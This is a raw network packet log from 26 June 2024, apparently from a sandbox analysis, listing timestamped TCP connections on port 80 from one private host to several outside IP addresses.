Jun 26, 2024 14:56:09.789356947 CEST	65224	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:09.794704914 CEST	80	65224	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:10.432984114 CEST	80	65224	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:10.433039904 CEST	80	65224	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:10.433208942 CEST	65224	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:11.294049978 CEST	65224	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:12.312268019 CEST	65225	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:12.317290068 CEST	80	65225	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:12.317482948 CEST	65225	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:12.319386959 CEST	65225	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:12.324431896 CEST	80	65225	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:12.324462891 CEST	80	65225	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:12.954638004 CEST	80	65225	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:12.954762936 CEST	80	65225	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:12.954857111 CEST	65225	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:13.825247049 CEST	65225	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:14.844960928 CEST	65226	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:14.852571964 CEST	80	65226	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:14.852739096 CEST	65226	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:14.855256081 CEST	65226	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:14.862320900 CEST	80	65226	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:15.495475054 CEST	80	65226	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:15.495502949 CEST	80	65226	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:15.495677948 CEST	65226	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:15.499228001 CEST	65226	80	192.168.2.5	46.30.213.191
Jun 26, 2024 14:56:15.504152060 CEST	80	65226	46.30.213.191	192.168.2.5
Jun 26, 2024 14:56:20.672447920 CEST	65227	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:20.677588940 CEST	80	65227	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:20.682305098 CEST	65227	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:20.685163975 CEST	65227	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:20.690078974 CEST	80	65227	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:21.440620899 CEST	80	65227	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:21.440682888 CEST	80	65227	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:21.440798044 CEST	65227	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:22.204330921 CEST	65227	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:23.218571901 CEST	65228	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:23.223748922 CEST	80	65228	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:23.223839998 CEST	65228	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:23.227488995 CEST	65228	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:23.232466936 CEST	80	65228	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:23.968946934 CEST	80	65228	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:23.969568014 CEST	80	65228	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:23.976486921 CEST	65228	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:24.732662916 CEST	65228	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:25.750996113 CEST	65229	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:25.756220102 CEST	80	65229	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:25.756534100 CEST	65229	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:25.758449078 CEST	65229	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:25.763488054 CEST	80	65229	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:25.763521910 CEST	80	65229	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:26.523169041 CEST	80	65229	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:26.523194075 CEST	80	65229	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:26.523325920 CEST	65229	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:27.262695074 CEST	65229	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.282164097 CEST	65230	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.287180901 CEST	80	65230	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:28.287336111 CEST	65230	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.290158033 CEST	65230	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.294948101 CEST	80	65230	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:28.977847099 CEST	80	65230	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:28.977897882 CEST	80	65230	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:28.978020906 CEST	65230	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.980717897 CEST	65230	80	192.168.2.5	85.159.66.93
Jun 26, 2024 14:56:28.985595942 CEST	80	65230	85.159.66.93	192.168.2.5
Jun 26, 2024 14:56:34.052246094 CEST	65231	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:34.057200909 CEST	80	65231	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:34.060581923 CEST	65231	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:34.064244986 CEST	65231	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:34.069201946 CEST	80	65231	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:34.721060991 CEST	80	65231	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:34.721868992 CEST	80	65231	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:34.728379965 CEST	65231	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:35.578385115 CEST	65231	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:36.593379021 CEST	65232	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:36.598421097 CEST	80	65232	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:36.600346088 CEST	65232	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:36.604502916 CEST	65232	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:36.609386921 CEST	80	65232	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:37.230319023 CEST	80	65232	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:37.230449915 CEST	80	65232	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:37.230523109 CEST	65232	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:38.106470108 CEST	65232	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:39.125766993 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:39.134793043 CEST	80	65233	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:39.134887934 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:39.136868000 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:39.141704082 CEST	80	65233	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:39.141872883 CEST	80	65233	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:39.767164946 CEST	80	65233	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:39.809514999 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:39.860532045 CEST	80	65233	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:39.860603094 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:40.656224966 CEST	65233	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:41.672286987 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:41.677474022 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:41.677572012 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:41.679671049 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:41.684611082 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351499081 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351555109 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351591110 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351624012 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351658106 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351691961 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351711988 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.351726055 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351759911 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351769924 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.351808071 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.351819992 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351850986 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.351872921 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.351977110 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.357126951 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.406172991 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.445384979 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445405960 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445421934 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445437908 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445453882 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445468903 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445485115 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445499897 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.445586920 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.445586920 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.446173906 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.446232080 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.446438074 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:42.446553946 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.449887991 CEST	65234	80	192.168.2.5	91.195.240.94
Jun 26, 2024 14:56:42.454740047 CEST	80	65234	91.195.240.94	192.168.2.5
Jun 26, 2024 14:56:55.743722916 CEST	65235	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:55.749196053 CEST	80	65235	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:55.754209042 CEST	65235	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:55.754209042 CEST	65235	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:55.759296894 CEST	80	65235	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:56.432214022 CEST	80	65235	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:56.432318926 CEST	80	65235	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:56.432394028 CEST	65235	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:57.264358044 CEST	65235	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:58.282362938 CEST	65236	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:58.287447929 CEST	80	65236	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:58.287534952 CEST	65236	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:58.289648056 CEST	65236	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:58.294526100 CEST	80	65236	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:58.948954105 CEST	80	65236	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:58.949771881 CEST	80	65236	66.29.149.46	192.168.2.5
Jun 26, 2024 14:56:58.956208944 CEST	65236	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:56:59.796535969 CEST	65236	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:00.813457012 CEST	65237	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:00.818535089 CEST	80	65237	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:00.818624973 CEST	65237	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:00.821873903 CEST	65237	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:00.826757908 CEST	80	65237	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:00.826813936 CEST	80	65237	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:01.477955103 CEST	80	65237	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:01.478061914 CEST	80	65237	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:01.478185892 CEST	65237	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:02.325246096 CEST	65237	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.343398094 CEST	65238	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.348556995 CEST	80	65238	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:03.348695993 CEST	65238	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.350552082 CEST	65238	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.356605053 CEST	80	65238	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:03.961219072 CEST	80	65238	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:03.963072062 CEST	80	65238	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:03.963143110 CEST	65238	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.964334011 CEST	65238	80	192.168.2.5	66.29.149.46
Jun 26, 2024 14:57:03.969166994 CEST	80	65238	66.29.149.46	192.168.2.5
Jun 26, 2024 14:57:09.068521976 CEST	65239	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:09.076868057 CEST	80	65239	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:09.082429886 CEST	65239	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:09.082429886 CEST	65239	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:09.087588072 CEST	80	65239	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:09.753148079 CEST	80	65239	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:09.753319979 CEST	80	65239	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:09.760226965 CEST	65239	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:10.593655109 CEST	65239	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:11.609246969 CEST	65240	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:11.614706039 CEST	80	65240	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:11.615092039 CEST	65240	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:11.617249966 CEST	65240	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:11.627593040 CEST	80	65240	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:12.306957960 CEST	80	65240	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:12.326780081 CEST	80	65240	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:12.326850891 CEST	65240	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:13.122107983 CEST	65240	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:14.146899939 CEST	65241	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:14.151957035 CEST	80	65241	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:14.152043104 CEST	65241	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:14.154470921 CEST	65241	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:14.159313917 CEST	80	65241	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:14.159441948 CEST	80	65241	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:14.933590889 CEST	80	65241	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:14.933666945 CEST	80	65241	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:14.933722019 CEST	65241	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:15.669203997 CEST	65241	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:16.706134081 CEST	65242	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:16.711276054 CEST	80	65242	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:16.711466074 CEST	65242	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:16.716113091 CEST	65242	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:16.721081018 CEST	80	65242	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:17.424397945 CEST	80	65242	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:17.425209045 CEST	80	65242	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:17.425332069 CEST	65242	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:17.430250883 CEST	65242	80	192.168.2.5	195.110.124.133
Jun 26, 2024 14:57:17.435735941 CEST	80	65242	195.110.124.133	192.168.2.5
Jun 26, 2024 14:57:23.123078108 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:23.128177881 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.128643990 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:23.132333040 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:23.137124062 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.652044058 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.652072906 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.652091026 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.652185917 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:23.652636051 CEST	80	65243	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:23.653402090 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:24.637742996 CEST	65243	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:25.658238888 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:25.663309097 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:25.666357040 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:25.670231104 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:25.680613995 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:26.197143078 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:26.197160006 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:26.197170019 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:26.197220087 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:26.198095083 CEST	80	65244	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:26.198148012 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:27.170233011 CEST	65244	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:28.204929113 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:28.209794998 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.209873915 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:28.212186098 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:28.217031002 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.217051983 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.756469965 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.756495953 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.756506920 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.756557941 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:28.757230997 CEST	80	65245	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:28.757291079 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:29.718256950 CEST	65245	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:30.742643118 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:30.748153925 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:30.748235941 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:30.750226021 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:30.755143881 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:31.292165041 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:31.292558908 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:31.294317961 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:31.294373989 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:31.298463106 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:31.302234888 CEST	65246	80	192.168.2.5	23.227.38.74
Jun 26, 2024 14:57:31.311372995 CEST	80	65246	23.227.38.74	192.168.2.5
Jun 26, 2024 14:57:37.312472105 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:37.317440033 CEST	80	65247	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:37.320473909 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:37.322074890 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:37.327014923 CEST	80	65247	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:37.961982012 CEST	80	65247	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:37.965033054 CEST	80	65247	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:37.965111971 CEST	80	65247	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:37.965184927 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:37.968570948 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:38.825195074 CEST	65247	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:39.844300985 CEST	65248	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:39.849476099 CEST	80	65248	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:39.852507114 CEST	65248	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:39.856323004 CEST	65248	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:39.861172915 CEST	80	65248	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:40.508094072 CEST	80	65248	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:40.508295059 CEST	80	65248	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:40.508361101 CEST	65248	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:41.356533051 CEST	65248	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:42.376091003 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:42.381094933 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:42.381190062 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:42.383059025 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:42.388124943 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:42.388155937 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:43.016334057 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:43.019407034 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:43.019422054 CEST	80	65249	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:43.019490957 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:43.019543886 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:43.887768984 CEST	65249	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:44.906965017 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:44.912055969 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:44.912143946 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:44.913909912 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:44.918759108 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.562141895 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.562167883 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.562184095 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.562201023 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.562306881 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:45.572127104 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.572141886 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.572158098 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:45.572246075 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:45.572473049 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:45.576405048 CEST	65250	80	192.168.2.5	34.120.249.181
Jun 26, 2024 14:57:45.581211090 CEST	80	65250	34.120.249.181	192.168.2.5
Jun 26, 2024 14:57:50.793690920 CEST	65251	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:50.798870087 CEST	80	65251	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:50.798962116 CEST	65251	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:50.800465107 CEST	65251	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:50.805314064 CEST	80	65251	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:51.360354900 CEST	80	65251	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:51.360399961 CEST	80	65251	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:51.360477924 CEST	65251	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:52.309726954 CEST	65251	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:53.328311920 CEST	65252	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:53.333412886 CEST	80	65252	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:53.334356070 CEST	65252	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:53.337353945 CEST	65252	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:53.342349052 CEST	80	65252	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:53.921366930 CEST	80	65252	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:53.921412945 CEST	80	65252	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:53.925297976 CEST	65252	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:54.840886116 CEST	65252	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:55.860349894 CEST	65253	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:55.865426064 CEST	80	65253	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:55.868060112 CEST	65253	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:55.868060112 CEST	65253	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:55.873697996 CEST	80	65253	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:55.873992920 CEST	80	65253	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:56.433873892 CEST	80	65253	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:56.433989048 CEST	80	65253	217.196.55.202	192.168.2.5
Jun 26, 2024 14:57:56.434068918 CEST	65253	80	192.168.2.5	217.196.55.202
Jun 26, 2024 14:57:57.372061014 CEST	65253	80	192.168.2.5	217.196.55.202
